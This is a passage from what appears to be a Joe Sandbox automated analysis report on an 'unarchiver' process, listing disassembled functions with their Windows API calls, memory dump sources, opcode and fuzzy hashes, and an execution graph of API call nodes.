                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 4241100979-0
                                                                                                            • Opcode ID: bbacb8cd807fb36abadcb6915635fd9ba27ab13f379ea07136b5067eea7ce8b0
                                                                                                            • Instruction ID: bcb81ee4c52242acfa366a3bb8334729748814923abf8b7f521efdd3d101769a
                                                                                                            • Opcode Fuzzy Hash: bbacb8cd807fb36abadcb6915635fd9ba27ab13f379ea07136b5067eea7ce8b0
                                                                                                            • Instruction Fuzzy Hash: 1C1152716042489FDB50CF19D884766FBD8EF04311F19C0BADE49CB652D6B4DA44CB63
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB278 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00CFB2CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 31276548-0
                                                                                                            • Opcode ID: 62bceadda30080f1dfe9e08da8390e02e435da5ea541a323f4c14ab9bbfe86a6
                                                                                                            • Instruction ID: 49d5291c1058ffbe9388186d0520866be41a1d4cc8ecad64ff0f72e33c8dc174
                                                                                                            • Opcode Fuzzy Hash: 62bceadda30080f1dfe9e08da8390e02e435da5ea541a323f4c14ab9bbfe86a6
                                                                                                            • Instruction Fuzzy Hash: 831170714093849FDB12CF15DC84B56FFB4DF46220F1880EBED848F252D275A908CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00CFA1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            • Opcode ID: e9837a5cb20b7cf5fcd1e5a728786cd63ccdd8d05ecb50a9a114049a93fa1481
                                                                                                            • Instruction ID: d99b7f4ed4be6611882fe287caf3bb1fa3bddfd174a73e7db3a3fa9d0f88732e
                                                                                                            • Opcode Fuzzy Hash: e9837a5cb20b7cf5fcd1e5a728786cd63ccdd8d05ecb50a9a114049a93fa1481
                                                                                                            • Instruction Fuzzy Hash: F9018471540200ABD710DF2ADC85B66FBA8FF88B20F24816AED089B741D675F915CBE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFACAA Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00CFACFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreatePipe
                                                                                                            • String ID:
                                                                                                            • API String ID: 2719314638-0
                                                                                                            • Opcode ID: 3d0c736ab15634abdf10a297ab1d88f4b786507a476d0adf91c98f517bc772e8
                                                                                                            • Instruction ID: 65e19a6f90cdb42761e154119d03f63b9fafa35a5d4a43352d502ea855186c63
                                                                                                            • Opcode Fuzzy Hash: 3d0c736ab15634abdf10a297ab1d88f4b786507a476d0adf91c98f517bc772e8
                                                                                                            • Instruction Fuzzy Hash: 30018471540200ABD750DF2ADC85F66FBA8FF88B20F24816AED089B741D671F915CBE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFAB2E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CFAB7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 7e3e302bd31c795e309285023f477b959c76f16a113a64669bc22f7bec71c1ae
                                                                                                            • Instruction ID: 9a46a6be5bfdc80a9ef3b9c313e183d1f15a226bdd6249987f43fd8a36c8f6cd
                                                                                                            • Opcode Fuzzy Hash: 7e3e302bd31c795e309285023f477b959c76f16a113a64669bc22f7bec71c1ae
                                                                                                            • Instruction Fuzzy Hash: B401A271540204ABD610DF1ADC82F26FBA8FF88B20F14811AED084B741D371F915CBE6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA622 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00CFA654
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 4a66b7249a7653c7679edf0dd95a107f6a715f741acaafad2622ffd639f6a9cb
                                                                                                            • Instruction ID: 1184588f202a6bc83b240b360d5de56d2be512e3b7b21be94d90faf246bcb46b
                                                                                                            • Opcode Fuzzy Hash: 4a66b7249a7653c7679edf0dd95a107f6a715f741acaafad2622ffd639f6a9cb
                                                                                                            • Instruction Fuzzy Hash: FD018F715042449FDB51CF29D8857A6FBA4EF44320F18C0AAEE49CF652D674E908CBA3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFB076 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFind
                                                                                                            • String ID:
                                                                                                            • API String ID: 1863332320-0
                                                                                                            • Opcode ID: f523519549ab4628a44b6b7d9d83bb2d3c4236e1b6eb7bb1b74d4009971f14ca
                                                                                                            • Instruction ID: 7b9f42cd68096a187ecc1b91a852abb29828cbd4bc0d92447c4e143a713b6a02
                                                                                                            • Opcode Fuzzy Hash: f523519549ab4628a44b6b7d9d83bb2d3c4236e1b6eb7bb1b74d4009971f14ca
                                                                                                            • Instruction Fuzzy Hash: 9F01D1755043488FDB508F1AD88476AFBA4EF04320F18C0AADE198B752DB75E848DB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CFA2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00CFA30C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440822275.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cfa000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: b1fe08fea98a0c40a26849155ff0148fc530e1efb5072dcb2c9ffa66ffda868d
                                                                                                            • Instruction ID: b8224283666ecb59eaf32ed9d4574300a327d4716350b0581a792d6f05a513b0
                                                                                                            • Opcode Fuzzy Hash: b1fe08fea98a0c40a26849155ff0148fc530e1efb5072dcb2c9ffa66ffda868d
                                                                                                            • Instruction Fuzzy Hash: 46F0AF749043488FDB60CF0AD884765FBA4EF04720F18C09ADE494F766D375E908CAA3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE1988 Relevance: .2, Instructions: 196COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 790e525b87122b502fa129aab9576065a7de9669ec1c4bdab8dd38001fd5f359
                                                                                                            • Instruction ID: 5c7a9e05af8d6fdec758a0d298eacbb8e1ada052c898d7843409ec94faa50778
                                                                                                            • Opcode Fuzzy Hash: 790e525b87122b502fa129aab9576065a7de9669ec1c4bdab8dd38001fd5f359
                                                                                                            • Instruction Fuzzy Hash: 5981C474E01209CFCB08DFA9C5809AEFBB2BF89304F249569D405B7394DB35AA82DF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE1419 Relevance: .2, Instructions: 157COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da094c5fd9b1026b2829bde3af6045a4eda75a9ff5792d62dbb427032966a10d
                                                                                                            • Instruction ID: 517299e68f6de28006e8e2baeee1dce210384c9419e6fda1b66f38e2bef23608
                                                                                                            • Opcode Fuzzy Hash: da094c5fd9b1026b2829bde3af6045a4eda75a9ff5792d62dbb427032966a10d
                                                                                                            • Instruction Fuzzy Hash: E451E671E42218DFCB18DFB9D4809EEBBB2BF8A300F209469E405B7354DB359982DB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE12E8 Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7b62964d3b2b4971b8d41f12bcf6e2e6d7ff8ce7fc0d6e0c225b7c82de772260
                                                                                                            • Instruction ID: 47d3bdd797da63cda677a6488f22812421bdde5cb8abac06c83eb70ac91b6561
                                                                                                            • Opcode Fuzzy Hash: 7b62964d3b2b4971b8d41f12bcf6e2e6d7ff8ce7fc0d6e0c225b7c82de772260
                                                                                                            • Instruction Fuzzy Hash: B7113D72D11218AFCB05DFA5E9909EFBBB2FF86310F101529E90177354DB30AA1ACB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE12F8 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3da0e93c3a84db95a2fd6518388031816547a1c24410f61adc9c7c66f3138fbc
                                                                                                            • Instruction ID: b76e541d1df3820d7acc141168a04ffd16a90a136716fb8ce1c9f7103de909c2
                                                                                                            • Opcode Fuzzy Hash: 3da0e93c3a84db95a2fd6518388031816547a1c24410f61adc9c7c66f3138fbc
                                                                                                            • Instruction Fuzzy Hash: 3A111C31E11218AFCB05DFA5E9409EFBBB6FF86310F101429E50577354DB30A949CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE13A8 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ddbc615e3819f631accd12982f68ad03ab0541e466d4fab75e9a60d125e47d20
                                                                                                            • Instruction ID: 8e5d7a652b6d702604c5d086c83b22f95ff3f982ecac4847cb8be9f85b87e768
                                                                                                            • Opcode Fuzzy Hash: ddbc615e3819f631accd12982f68ad03ab0541e466d4fab75e9a60d125e47d20
                                                                                                            • Instruction Fuzzy Hash: C101F6B8D05208DFCB45EFAAD9815EEBFF1EF89300F2491AAC414A7211E6301B05DF52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE1630 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b96f51e7ef99cbb85987d47131469f8885fc6230bf7251aefd62e681a9ab9c03
                                                                                                            • Instruction ID: fcbb536369da9a1933120efa8467e2751cb293affa2dcba634b8669785a41881
                                                                                                            • Opcode Fuzzy Hash: b96f51e7ef99cbb85987d47131469f8885fc6230bf7251aefd62e681a9ab9c03
                                                                                                            • Instruction Fuzzy Hash: 6601DD70D02309DFCB04EFA9C4857AEBBB0AB45305F2099A9C411B3280D778AA84DF95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010B081E Relevance: .0, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441095347.00000000010B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_10b0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e741bf432fea1991378ead4bd4e84bed9cc9711e5d88b03b6436ed9ffab7247d
                                                                                                            • Instruction ID: ed60584da1fffe09e198b5b258903e889b2fb6ac837480cbe900bbcffb60c6c0
                                                                                                            • Opcode Fuzzy Hash: e741bf432fea1991378ead4bd4e84bed9cc9711e5d88b03b6436ed9ffab7247d
                                                                                                            • Instruction Fuzzy Hash: A4F082B2945204AFD240DF09EC45896F7ECDF84621B14C52EED088B700E276A9144AE2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010B05F6 Relevance: .0, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441095347.00000000010B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_10b0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d3e87215627f3f2b86d5c14685de8d873d94b20725c1c2bfa09ffb8599e5e344
                                                                                                            • Instruction ID: 91c2b9af7aa8b1de20e5c708135ba313fd85cffc7728eddf17d713d108e63370
                                                                                                            • Opcode Fuzzy Hash: d3e87215627f3f2b86d5c14685de8d873d94b20725c1c2bfa09ffb8599e5e344
                                                                                                            • Instruction Fuzzy Hash: C3E092B66446044BD650CF0AEC81452F7E8EB84630718C07FDC0D8B700E535F904CEA6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CF23F4 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440817454.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cf2000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c015f2c0dd824ad8228986bb0238c17c93fb52fe1e992d181cfb7a12b2c23f6
                                                                                                            • Instruction ID: 2af70872d9ef1c9a86a999ffbf540a5cdd0478266e7c0578912229330eace7b0
                                                                                                            • Opcode Fuzzy Hash: 1c015f2c0dd824ad8228986bb0238c17c93fb52fe1e992d181cfb7a12b2c23f6
                                                                                                            • Instruction Fuzzy Hash: A2D05E79205A814FD3278A1CC1A8BA53F94AB51B04F4784FAE8408B663C3A8DA81E211
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00CF23BC Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.440817454.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_cf2000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c306588d81552df4ebc73ffb3f4932be51ea05c15613b6236996f88a4fd4a58
                                                                                                            • Instruction ID: aef95d987a8c71be6f7cc756b2becbc64eab8d36729d88fdeab424a28abea831
                                                                                                            • Opcode Fuzzy Hash: 5c306588d81552df4ebc73ffb3f4932be51ea05c15613b6236996f88a4fd4a58
                                                                                                            • Instruction Fuzzy Hash: 8FD05E742016854FC715DB0CC194F6937D8AB41B00F0644E8BD108B272C3B8DD85C600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 04EE0AB7 Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1125acc0e13cae4d1c2a7a54e7bb27a2091fe81eb93a2030f89d9d68b2ecb89
                                                                                                            • Instruction ID: 7a522575177839073f6301494f3e27619956b70d491456b3ae37636fe3aedea6
                                                                                                            • Opcode Fuzzy Hash: f1125acc0e13cae4d1c2a7a54e7bb27a2091fe81eb93a2030f89d9d68b2ecb89
                                                                                                            • Instruction Fuzzy Hash: 19F0F835E45128CFCB00CE96E4806FCF7B9FB4A355F60A256C00A67206D375E985DB48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04EE0A7C Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.441462231.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4ee0000_unarchiver.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b73c5b075a1e4520b79c5d16a5952616749156f55bcf1d39ba63c682011a930c
                                                                                                            • Instruction ID: 4fa2084030e054667641527d6ee69b955d9d66e142c9758977a31f85ac620c56
                                                                                                            • Opcode Fuzzy Hash: b73c5b075a1e4520b79c5d16a5952616749156f55bcf1d39ba63c682011a930c
                                                                                                            • Instruction Fuzzy Hash: 86F03935E45128CFCB00CE96E4805FCF379FB4A315F60A296C00AA7206D375E985DA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:2.1%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:63
                                                                                                            execution_graph 14108 32e11bc 14109 32e11d6 14108->14109 14122 32e117d 14109->14122 14114 32e1219 14118 32e8d86 2 API calls 14114->14118 14120 32e11f2 14118->14120 14123 32e9f75 2 API calls 14122->14123 14124 32e118e 14123->14124 14125 32e9ba4 2 API calls 14124->14125 14126 32e11aa 14125->14126 14127 32e8d2e 2 API calls 14126->14127 14128 32e11b7 14127->14128 14128->14120 14129 32e7c0e 14128->14129 14180 32e7e5c 14129->14180 14131 32e7c2b 14143 32e1210 14131->14143 14191 32e769f 14131->14191 14133 32e7c5c 14134 32e8d86 2 API calls 14133->14134 14136 32e7c97 14134->14136 14135 32e7c55 14135->14133 14208 32e7639 14135->14208 14138 32e8d86 2 API calls 14136->14138 14140 32e7ca2 14138->14140 14142 32e8d86 2 API calls 14140->14142 14142->14143 14143->14114 14144 32eb403 14143->14144 14145 32eaaba 4 API calls 14144->14145 14146 32eb415 14145->14146 14147 32ea202 GetSystemTimeAsFileTime 14146->14147 14148 32e123c 14147->14148 14149 32e7d83 14148->14149 14462 32f053f 14149->14462 14151 32e7da1 14152 32ebf67 RtlAllocateHeap 14151->14152 14153 32e7dae 14152->14153 14169 32e7db8 14153->14169 14465 32e87e2 14153->14465 14155 32e8d86 2 API calls 14156 32e7e34 14155->14156 14157 32e8d86 2 API calls 14156->14157 14159 32e7e3e 14157->14159 14158 32e7dcc 14160 32e769f 19 API calls 14158->14160 14158->14169 14161 32e8d86 2 API calls 14159->14161 14165 32e7df3 14160->14165 14162 32e7e48 14161->14162 14163 32e8d86 2 API calls 14162->14163 14164 32e1256 14163->14164 14164->14114 14170 32e110a 14164->14170 14166 32e7639 8 API calls 14165->14166 14165->14169 14167 32e7e19 14166->14167 14168 32e786c 18 API calls 14167->14168 14168->14169 14169->14155 14171 32e1120 14170->14171 14172 32ea078 memset 14171->14172 14179 32e1174 14171->14179 14173 32e1146 14172->14173 14174 32ea202 GetSystemTimeAsFileTime 14173->14174 14175 32e115b 14174->14175 14176 32eac2e 6 API calls 14175->14176 14177 32e1169 14176->14177 14178 32eac02 6 API calls 14177->14178 14178->14179 14179->14114 14220 32f11d0 14180->14220 14182 32e7e65 14224 32e88ce 14182->14224 14184 32e7e78 14185 32e88ce strncpy 14184->14185 14186 32e7e8c 14185->14186 14187 32e88ce strncpy 14186->14187 14188 32e7ea0 14187->14188 14228 32f1c51 14188->14228 14190 32e7ea8 14190->14131 14316 32e7588 14191->14316 14194 32ebf67 RtlAllocateHeap 14196 32e76d9 14194->14196 14195 32e770e 14198 32e8d86 2 API calls 14195->14198 14196->14195 14327 32e74a5 14196->14327 14199 32e7726 14198->14199 14200 32e8d86 2 API calls 14199->14200 14201 32e7731 14200->14201 14202 32e8d86 2 API calls 14201->14202 14204 32e773c 14202->14204 14203 32e76e7 14203->14195 14335 32efb2f 14203->14335 14206 32e7746 14204->14206 14207 32e8d86 2 API calls 14204->14207 14206->14135 14207->14206 14209 32ebfd9 2 API calls 14208->14209 14210 32e7651 14209->14210 14211 32e768d 14210->14211 14212 32e7501 5 API calls 14210->14212 14217 32e786c 14211->14217 14213 32e7670 14212->14213 14214 32f04a2 lstrlenW 14213->14214 14215 32e7684 14214->14215 14216 32e8e72 lstrlenW 14215->14216 14216->14211 14403 32f1d3e 14217->14403 14219 32e7885 14219->14133 14221 32f11d8 14220->14221 14223 32f11df 14221->14223 14233 32f290c 14221->14233 14223->14182 14225 32e88df 14224->14225 14226 32e88e4 14224->14226 14225->14184 14251 32f12b0 14226->14251 14229 32f1c60 14228->14229 14230 32f1c65 14229->14230 14263 32f1bf5 14229->14263 14230->14190 14232 32f1c7e 14232->14190 14234 32f294e 14233->14234 14235 32f291b 14233->14235 14234->14223 14236 32f293f SwitchToThread 14235->14236 14237 32f292c 14235->14237 14236->14234 14236->14236 14239 32f2935 14237->14239 14240 32f28e6 14237->14240 14239->14223 14245 32f296e GetModuleHandleW 14240->14245 14242 32f28f3 14243 32f2901 14242->14243 14250 32f2950 _time64 GetCurrentProcessId 14242->14250 14243->14239 14246 32f298c GetProcAddress 14245->14246 14249 32f29bd 14245->14249 14247 32f29a0 GetProcAddress 14246->14247 14246->14249 14248 32f29af GetProcAddress 14247->14248 14247->14249 14248->14249 14249->14242 14250->14243 14252 32f12bb 14251->14252 14253 32f12e2 14251->14253 14252->14253 14255 32f12f6 14252->14255 14253->14225 14256 32f1324 14255->14256 14257 32f1301 14255->14257 14256->14253 14257->14256 14259 32f2ef8 14257->14259 14260 32f2f10 14259->14260 14261 32f2f97 strncpy 14260->14261 14262 32f2f63 14260->14262 14261->14262 14262->14256 14265 32f1c08 14263->14265 14264 32f1c24 14264->14232 14265->14264 14267 32f14e2 14265->14267 14268 32f1510 14267->14268 14278 32f1522 14267->14278 14269 32f15cd 14268->14269 14270 32f154c 14268->14270 14271 32f157c 14268->14271 14272 32f16e0 14268->14272 14277 32f15ac 14268->14277 14268->14278 14308 32f1cab _snprintf 14269->14308 14275 32f1552 _snprintf 14270->14275 14291 32f33f7 14271->14291 14274 32f1cab 2 API calls 14272->14274 14279 32f170f 14274->14279 14275->14278 14303 32f1a27 14277->14303 14278->14264 14279->14278 14283 32f1791 14279->14283 14288 32f18c7 14279->14288 14281 32f14e2 11 API calls 14282 32f15dc 14281->14282 14282->14278 14282->14281 14283->14278 14285 32f17d2 qsort 14283->14285 14284 32f1a27 2 API calls 14284->14288 14285->14278 14290 32f17fb 14285->14290 14286 32f14e2 11 API calls 14286->14288 14287 32f1a27 2 API calls 14287->14290 14288->14278 14288->14284 14288->14286 14289 32f14e2 11 API calls 14289->14290 14290->14278 14290->14287 14290->14289 14292 32f3404 _snprintf 14291->14292 14293 32f3401 14291->14293 14294 32f342d 14292->14294 14302 32f34a4 14292->14302 14293->14292 14294->14302 14313 32f33d0 localeconv 14294->14313 14297 32f346b strchr 14300 32f347e 14297->14300 14297->14302 14298 32f3447 strchr 14298->14297 14299 32f3455 14298->14299 14299->14297 14299->14302 14301 32e8e72 lstrlenW 14300->14301 14300->14302 14301->14302 14302->14278 14307 32f1a3d 14303->14307 14304 32f1bc5 14304->14278 14305 32f1b57 _snprintf 14305->14307 14306 32f1b40 _snprintf 14306->14307 14307->14304 14307->14305 14307->14306 14310 32f1ccc 14308->14310 14309 32f1cd3 14309->14282 14310->14309 14311 32f2ef8 strncpy 14310->14311 14312 32f1ce9 14311->14312 14312->14282 14314 32f33f2 strchr 14313->14314 14315 32f33e0 strchr 14313->14315 14314->14297 14314->14298 14315->14314 14339 32e8d70 RtlAllocateHeap 14316->14339 14318 32e75a2 14319 32f3598 2 API calls 14318->14319 14326 32e7623 14318->14326 14320 32e75c6 14319->14320 14340 32e7501 14320->14340 14322 32e75db 14323 32f04a2 lstrlenW 14322->14323 14324 32e760e 14323->14324 14325 32e8f0a memset 14324->14325 14325->14326 14326->14194 14326->14206 14328 32e74b6 14327->14328 14329 32e9877 2 API calls 14328->14329 14330 32e74d2 14329->14330 14349 32e8d70 RtlAllocateHeap 14330->14349 14332 32e74dd 14333 32e74f7 14332->14333 14334 32e9faf 2 API calls 14332->14334 14333->14203 